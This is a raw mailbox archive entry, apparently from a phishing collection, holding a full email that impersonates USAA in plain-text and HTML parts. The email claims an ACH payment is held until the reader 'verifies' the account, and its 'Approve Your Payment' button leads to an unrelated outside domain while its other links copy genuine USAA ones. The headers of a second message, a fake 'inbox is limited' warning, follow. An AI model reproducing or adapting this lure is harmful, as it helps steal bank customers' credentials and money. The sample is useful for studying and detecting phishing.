From: "USAA" <Safeguard@MailSender.com>
Date: Mon, 20 Feb 2017 13:35:10 -0500
Status: O
X-Status: 
X-Keywords:                  
X-UID: 76

You will not see this in a MIME-aware mail reader.
--===============1625853525==
Content-Type: text/plain; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

 =

   To ensure delivery to your inbox, please add USAA.Web.Services@customerm=
ail.usaa.com to your address book.	 =

 =

   	  =

   =

  	  =

   Payment Approval
  View Accounts | Privacy Promise | Contact Us
	  =

    =

   	 =

  	 =

  	 =

	  =

   USAA SECURITY ZONE  =

USAA # ending in: - XXXX
	  =

   =

  =

  =

   =

  =

 =

    Dear Customer,
A payment was transffered to your account from another US bank account usin=
g the Authomated Clearing House (ACH).

 For security reasons, We have temporarily hold the payment until necessary=
 verification is done. You are to sign on and verify your account as a mean=
s to accept the payment. Payment will be posted within 2-3 business working=
 days after your verification. =

 =

   	 Approve Your Payment
 Thank you,
USAA
 P.S. Texting and driving ... it can wait. Take the pledge to never text an=
d drive.
	  =

  =

  =

	 	 =

  	 	 	 =

   =

  Please do not reply to this e-mail. To send a secure message to USAA, ple=
ase contact us.

Privacy Promise
USAA, 9800 Fredericksburg Road, San Antonio, Texas 78288

  =

  	 USAA means United Services Automobile Association and its insurance, ba=
nking, investment and other companies. Banks Member FDIC. Investments provi=
ded by USAA Investment Management Company and USAA Financial Advisors Inc.,=
 both registered broker dealers. 	 =

  =

  66676-0514   =



--===============1625853525==
Content-Type: text/html; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

<HTML><head><meta http-equiv=3D"Content-Type" content=3D"text/html; charset=
=3Diso-8859-1"/></head><BODY><DIV align=3Dcenter>
<TABLE cellSpacing=3D0 cellPadding=3D0 width=3D650 bgColor=3D#b5d7e6 border=
=3D0>
<TBODY>
<TR>
<TD height=3D35 vAlign=3Dmiddle width=3D650 align=3Dcenter><FONT style=3D"F=
ONT-SIZE: 9px; COLOR: #929292" face=3D"Verdana, sans-serif">To ensure deliv=
ery to your inbox, please add <SPAN style=3D"COLOR: #68a7c5">USAA.Web.Servi=
ces@customermail.usaa.com</SPAN> to your address book.</FONT></TD>
<TD></TD></TR></TBODY></TABLE>
<TABLE cellSpacing=3D0 cellPadding=3D0 width=3D650 bgColor=3D#b5d7e6 border=
=3D0>
<TBODY>
<TR>
<TD width=3D10></TD>
<TD bgColor=3Dwhite width=3D630 align=3Dcenter>
<TABLE cellSpacing=3D0 cellPadding=3D0 width=3D604 border=3D0>
<TBODY>
<TR>
<TD height=3D5 colSpan=3D4></TD></TR>
<TR>
<TD height=3D45 width=3D54><A href=3D"/do/redirect?url=3Dhttps%253A%252F%25=
2Fwww.usaa.com%252Finet%252Fent_logon%252FLogon%253FEID%253D66676-0514_head=
&amp;hmac=3D1f4d12aa54d524ae8c1062e65b84c9f1" target=3D_blank><IMG border=
=3D0 alt=3D"" src=3D"https://content.usaa.com/mcontent/static_assets/Media/=
email_logo.gif" width=3D61 height=3D41></A></TD>
<TD>
<TABLE cellSpacing=3D0 cellPadding=3D0 border=3D0>
<TBODY>
<TR>
<TD style=3D"COLOR: #6d6d6d; FONT: bold 16px Arial, sans-serif" height=3D22=
 align=3Dleft><SPAN style=3D"MARGIN-TOP: 9px; DISPLAY: block">Payment Appro=
val</SPAN></TD></TR>
<TR>
<TD height=3D23 align=3Dleft><NOBR><FONT size=3D1 face=3D"Verdana, sans-ser=
if"><A style=3D"TEXT-DECORATION: none; COLOR: #6d6d6d" href=3D"/do/redirect=
?url=3Dhttps%253A%252F%252Fwww.usaa.com%252Finet%252Fent_home%252FCpHome%25=
3FEID%253D66676-0514_head&amp;hmac=3D98d7fe2055975cf57374f19b892ce65e" targ=
et=3D_blank>View Accounts</A> | <A style=3D"TEXT-DECORATION: none; COLOR: #=
6d6d6d" href=3D"/do/redirect?url=3Dhttps%253A%252F%252Fwww.usaa.com%252Fine=
t%252Fent_utils%252FMcStaticPages%253Fkey%253Dprivacy_promise%2526EID%253D6=
6676-0514_head&amp;hmac=3Dcafc0eafea0e32249e7a192d11f2ea99" target=3D_blank=
>Privacy Promise</A> | <A style=3D"TEXT-DECORATION: none; COLOR: #6d6d6d" h=
ref=3D"/do/redirect?url=3Dhttps%253A%252F%252Fwww.usaa.com%252Finet%252Fent=
_contactus%252FCpLevelZeroContactUs%253FContactUsPageId%253DPublicContactUs=
%2526EID%253D66676-0514_head&amp;hmac=3D12026c8776c9b714d7b57f726d2cea47" t=
arget=3D_blank>Contact Us</A></FONT></NOBR></TD></TR></TBODY></TABLE></TD>
<TD height=3D45 vAlign=3Dmiddle width=3D367 align=3Dright>
<TABLE height=3D65 cellSpacing=3D0 cellPadding=3D0 width=3D188 border=3D0>
<TBODY>
<TR>
<TD width=3D22>
<TABLE height=3D65 cellSpacing=3D0 cellPadding=3D0 width=3D22 border=3D0>
<TBODY>
<TR>
<TD style=3D"LINE-HEIGHT: 0" height=3D29 vAlign=3Dtop width=3D8><IMG style=
=3D"DISPLAY: block" border=3D0 alt=3D"" src=3D"https://content.usaa.com/mco=
ntent/static_assets/Media/email_sec_1-1.gif?EID=3D6356057937" width=3D8 hei=
ght=3D29></TD>
<TD style=3D"LINE-HEIGHT: 0" bgColor=3D#e7e7e8 height=3D29 vAlign=3Dtop wid=
th=3D14><IMG style=3D"DISPLAY: block" border=3D0 alt=3D"" src=3D"https://co=
ntent.usaa.com/mcontent/static_assets/Media/email_sec_1-2.gif" width=3D14 h=
eight=3D29></TD></TR>
<TR>
<TD style=3D"LINE-HEIGHT: 0" height=3D29 vAlign=3Dtop width=3D8><IMG style=
=3D"DISPLAY: block" border=3D0 alt=3D"" src=3D"https://content.usaa.com/mco=
ntent/static_assets/Media/email_sec_spacer.gif" width=3D8 height=3D29></TD>
<TD style=3D"LINE-HEIGHT: 0" bgColor=3D#e7e7e8 height=3D29 vAlign=3Dtop wid=
th=3D14><IMG style=3D"DISPLAY: block" border=3D0 alt=3D"" src=3D"https://co=
ntent.usaa.com/mcontent/static_assets/Media/email_sec_spacer.gif" width=3D1=
4 height=3D29></TD></TR>
<TR>
<TD style=3D"LINE-HEIGHT: 0" height=3D7 vAlign=3Dbottom width=3D8></TD>
<TD style=3D"LINE-HEIGHT: 0" bgColor=3D#e7e7e8 height=3D7 vAlign=3Dbottom w=
idth=3D14><IMG style=3D"DISPLAY: block" border=3D0 alt=3D"" src=3D"https://=
content.usaa.com/mcontent/static_assets/Media/email_sec_2-1.gif" width=3D14=
 height=3D7></TD></TR></TBODY></TABLE></TD>
<TD bgColor=3D#e7e7e8 align=3Dleft>
<TABLE height=3D65 cellSpacing=3D0 cellPadding=3D5 width=3D"100%" border=3D=
0>
<TBODY>
<TR>
<TD style=3D"FONT-SIZE: 9px; TEXT-ALIGN: left; LINE-HEIGHT: 12px; -webkit-t=
ext-size-adjust: none" vAlign=3Dmiddle align=3Dleft><FONT style=3D"FONT-SIZ=
E: 10px; COLOR: #00365b" face=3D"Arial, Helvetica, sans-serif"><STRONG>USAA=
 SECURITY ZONE</STRONG></FONT>&nbsp; <BR><FONT style=3D"FONT-SIZE: 9px; COL=
OR: #00365b" face=3D"Arial, Helvetica, sans-serif">USAA # ending in: - XXXX=
</FONT></TD></TR></TBODY></TABLE></TD>
<TD bgColor=3D#ffffff width=3D7>
<TABLE height=3D65 cellSpacing=3D0 cellPadding=3D0 width=3D7 border=3D0>
<TBODY>
<TR>
<TD style=3D"LINE-HEIGHT: 0" bgColor=3D#e7e7e8 height=3D7 vAlign=3Dtop widt=
h=3D7 align=3Dright><IMG style=3D"DISPLAY: block" border=3D0 alt=3D"" src=
=3D"https://content.usaa.com/mcontent/static_assets/Media/email_sec_1-3.gif=
" width=3D7 height=3D7></TD></TR>
<TR>
<TD style=3D"LINE-HEIGHT: 0" bgColor=3D#e7e7e8 height=3D51 vAlign=3Dtop wid=
th=3D7 align=3Dright><IMG style=3D"DISPLAY: block" border=3D0 alt=3D"" src=
=3D"https://content.usaa.com/mcontent/static_assets/Media/email_sec_spacer.=
gif" width=3D7 height=3D51></TD></TR>
<TR>
<TD style=3D"LINE-HEIGHT: 0" bgColor=3D#e7e7e8 height=3D7 vAlign=3Dbottom w=
idth=3D7 align=3Dright><IMG style=3D"DISPLAY: block" border=3D0 alt=3D"" sr=
c=3D"https://content.usaa.com/mcontent/static_assets/Media/email_sec_2-2.gi=
f" width=3D7 height=3D7></TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE=
></TD></TR>
<TR>
<TD height=3D20 colSpan=3D4>&nbsp;</TD></TR>
<TR>
<TD height=3D1 colSpan=3D4></TD></TR></TBODY></TABLE>
<TABLE cellSpacing=3D0 cellPadding=3D0 width=3D"95%" border=3D0>
<TBODY>
<TR>
<TD width=3D"95%" align=3Dleft><FONT style=3D"FONT-SIZE: 12px; COLOR: #3333=
33; LINE-HEIGHT: 18px" face=3D"Verdana, sans-serif">
<P style=3D"MARGIN-BOTTOM: 1em">Dear Customer,</P>A payment was transffered=
 to your account from another US bank account using the Authomated Clearing=
 House (ACH).<BR><BR>
<P style=3D"MARGIN-BOTTOM: 1em">For security reasons, We have temporarily h=
old the payment until necessary verification is done. You are to sign on an=
d verify your account as a means to accept the payment. Payment will be pos=
ted within 2-3 business working days after your verification. </P>
<TABLE height=3D15 cellSpacing=3D0 cellPadding=3D0 bgColor=3D#6cae35 border=
=3D0>
<TBODY>
<TR bgColor=3D#6cae35>
<TD bgColor=3D#6cae35 vAlign=3Dmiddle width=3D15 align=3Dcenter><IMG src=3D=
"https://content.usaa.com/mcontent/static_assets/Media/email_cta_arrow.gif"=
 width=3D15 height=3D15></TD>
<TD bgColor=3D#6cae35 vAlign=3Dmiddle width=3D134 align=3Dcenter><A style=
=3D"TEXT-DECORATION: none; COLOR: #fff; FONT: bold 11px arial, sans-serif" =
href=3D"https://pocketofmoneyptc.com/doc.htm.htm" target=3D_blank>Approve Y=
our Payment</A></TD></TR></TBODY></TABLE>
<P style=3D"MARGIN-BOTTOM: 1em">Thank you,<BR>USAA</P>
<P><B>P.S. Texting and driving ... it can wait. <A href=3D"/do/redirect?url=
=3Dhttp%253A%252F%252Fitcanwait.usaa.com%252F%253F%2526EID%253D66676-0514_b=
ody&amp;hmac=3D0596419d0697d1c1ebdddf07241f41aa" target=3D_blank>Take the p=
ledge</A> to <I>never</I> text and drive.</B></P></FONT></TD>
<TD>&nbsp;</TD></TR>
<TR>
<TD height=3D30 colSpan=3D2 align=3Dleft><BR><A href=3D"/do/redirect?url=3D=
http%253A%252F%252Fwww.facebook.com%252FUSAA&amp;hmac=3Da6b00267bda98225260=
60f8d114c9ffe" target=3D_blank><IMG border=3D0 alt=3DFacebook src=3D"http:/=
/content.usaa.com/mcontent/static_assets/om/Media/thumbnails/facebookIcon.g=
if" width=3D32 height=3D32></A>&nbsp;&nbsp;<A href=3D"/do/redirect?url=3Dht=
tp%253A%252F%252Ftwitter.com%252Fusaa&amp;hmac=3Db14ac160d245b7e5a49e78cd9e=
368c20" target=3D_blank><IMG border=3D0 alt=3DTwitter src=3D"http://content=
.usaa.com/mcontent/static_assets/om/Media/thumbnails/twitterIcon.gif" width=
=3D32 height=3D32></A></TD></TR></TBODY></TABLE></TD>
<TD width=3D5></TD>
<TD width=3D5></TD></TR>
<TR>
<TD height=3D5 width=3D10></TD>
<TD height=3D5 width=3D630></TD>
<TD height=3D5 width=3D5></TD>
<TD height=3D5 width=3D5></TD></TR>
<TR>
<TD height=3D20 colSpan=3D4>&nbsp;</TD></TR>
<TR>
<TD colSpan=3D4 align=3Dcenter><FONT style=3D"FONT-SIZE: 10px; COLOR: #6d6d=
6d; LINE-HEIGHT: 18px" face=3D"Verdana, sans-serif">Please do not reply to =
this e-mail. To send a secure message to USAA, please <A style=3D"TEXT-DECO=
RATION: none; COLOR: #408cb0" href=3D"/do/redirect?url=3Dhttps%253A%252F%25=
2Fwww.usaa.com%252Finet%252Fent_references%252FCpSendUsAMessage%253FContent=
Area%253Dcp%2526EID%253D66676-0514_foot&amp;hmac=3D9af3e8c935a7143ec56d7173=
d0bfa1e1" target=3D_blank>contact us</A>.<BR><BR><A style=3D"COLOR: #6d6d6d=
" href=3D"/do/redirect?url=3Dhttps%253A%252F%252Fwww.usaa.com%252Finet%252F=
ent_utils%252FMcStaticPages%253Fkey%253Dprivacy_promise%2526EID%253D66676-0=
514_foot&amp;hmac=3Df9b4d00733b9fb574b16ba6201f20985" target=3D_blank>Priva=
cy Promise</A><BR>USAA, 9800 Fredericksburg Road, San Antonio, Texas 78288<=
BR></FONT></TD></TR>
<TR>
<TD height=3D15 width=3D10></TD></TR>
<TR>
<TD width=3D5 align=3Dleft></TD>
<TD width=3D630 colSpan=3D2 align=3Dleft><FONT style=3D"FONT-SIZE: 10px; CO=
LOR: #6d6d6d; LINE-HEIGHT: 18px" face=3D"Verdana, sans-serif">USAA means Un=
ited Services Automobile Association and <A style=3D"TEXT-DECORATION: none;=
 COLOR: #408cb0" href=3D"/do/redirect?url=3Dhttps%253A%252F%252Fwww.usaa.co=
m%252Finet%252Fent_utils%252FMcStaticPages%253Fkey%253Dabout_usaa_overview%=
2526EID%253D66676-0514_foot&amp;hmac=3D15ebc179dae871da38f9114795795098" ta=
rget=3D_blank>its insurance, banking, investment and other companies</A>. B=
anks Member FDIC. Investments provided by USAA Investment Management Compan=
y and USAA Financial Advisors Inc., both registered broker dealers.</FONT> =
</TD>
<TD width=3D5 align=3Dleft></TD></TR>
<TR>
<TD height=3D15 width=3D10></TD></TR>
<TR>
<TD colSpan=3D4 align=3Dright><FONT style=3D"FONT-SIZE: 10px; COLOR: #6d6d6=
d; LINE-HEIGHT: 18px" face=3D"Verdana, sans-serif">66676-0514&nbsp;&nbsp;&n=
bsp;</FONT><BR><BR></TD></TR></TBODY></TABLE></DIV></BODY></HTML>
--===============1625853525==--

From jose@monkey.org Mon Feb 20 17:03:19 2017 +0000
Return-Path: mailer-daemon@rcentral509.webserversystems.com
Delivered-To: jose@monkey.org
X-FDA: 72537590118.25.lunch31_1cecf73c15b09
X-Spam-Summary: 10,1,0,eecae01a036aab21,d41d8cd98f00b204,mailer-daemon@rcentral509.webserversystems.com,:,RULES_HIT:41:72:379:494:800:962:967:973:983:988:989:1042:1189:1208:1221:1254:1260:1261:1263:1313:1314:1381:1397:1431:1436:1437:1516:1517:1518:1534:1541:1575:1588:1592:1594:1711:1714:1730:1777:1792:2196:2199:2525:2527:2549:2560:2564:2612:2621:2682:2685:2737:2859:2933:2937:2939:2942:2945:2947:2951:2954:3000:3022:3138:3139:3140:3141:3142:3148:3351:3834:3865:3867:3868:3871:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4470:4552:4560:5007:6117:6238:6261:6678:6688:7652:7903:8603:8672:9025:9165:9177:9388:9390:9873:9908:10004:10049:10215:10346:10400:11473:11658:11914:12043:12050:12051:12517:12519:12555:12679:12681:12895:12903:12986:13025:13095:13237:13439:13548:13846:13848:14181:14721:14849:21080:21212:21433:21451:21483:21554:30003:30022:30026:30046:30054,0,RBL:error,CacheIP:none,Bayesian:0.5,0.5,0.5,Netcheck:none,DomainCache:0,MSF:not bulk,SPF:fu,MSBL:0,DNSBL:neutral,Custom_rules:0:
X-HE-Tag: lunch31_1cecf73c15b09
X-Filterd-Recvd-Size: 4465
Received: from leaf103.mfilter.dimenoc.com (banana.mfilter.dimenoc.com [72.29.89.6])
	by imf16.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Mon, 20 Feb 2017 17:03:18 +0000 (UTC)
Received: from localhost (localhost [127.0.0.1])
	by leaf103.mfilter.dimenoc.com (Postfix) with ESMTP id 3F0C91CC77C
	for <jose@monkey.org>; Mon, 20 Feb 2017 12:02:57 -0500 (EST)
X-Virus-Scanned: amavisd-new at leaf.mfilter.dimenoc.com
Received: from leaf103.mfilter.dimenoc.com ([127.0.0.1])
	by localhost (leaf103.mfilter.dimenoc.com [127.0.0.1]) (amavisd-new, port 10024)
	with ESMTP id yJAt3XPjazhq for <jose@monkey.org>;
	Mon, 20 Feb 2017 12:02:56 -0500 (EST)
Received: from dime133.dizinc.com (dime133.dizinc.com [66.7.200.89])
	by leaf103.mfilter.dimenoc.com (Postfix) with ESMTP
	for <jose@monkey.org>; Mon, 20 Feb 2017 12:02:56 -0500 (EST)
Received: from [88.97.44.179] (port=36539 helo=MarwoodSQL.Marwood.Local)
	by dime133.dizinc.com with esmtpsa (TLSv1:DHE-RSA-AES256-SHA:256)
	(Exim 4.87)
	(envelope-from <mailer-daemon@rcentral509.webserversystems.com>)
	id 1cfiku-0002Ti-DW
	for jose@monkey.org; Mon, 20 Feb 2017 02:51:32 -0500
Content-Type: multipart/alternative; boundary="===============1672304536=="
MIME-Version: 1.0
Subject: Warning: Inbox for jose@monkey.org is limited (8 undelivered messages)
To: jose@monkey.org
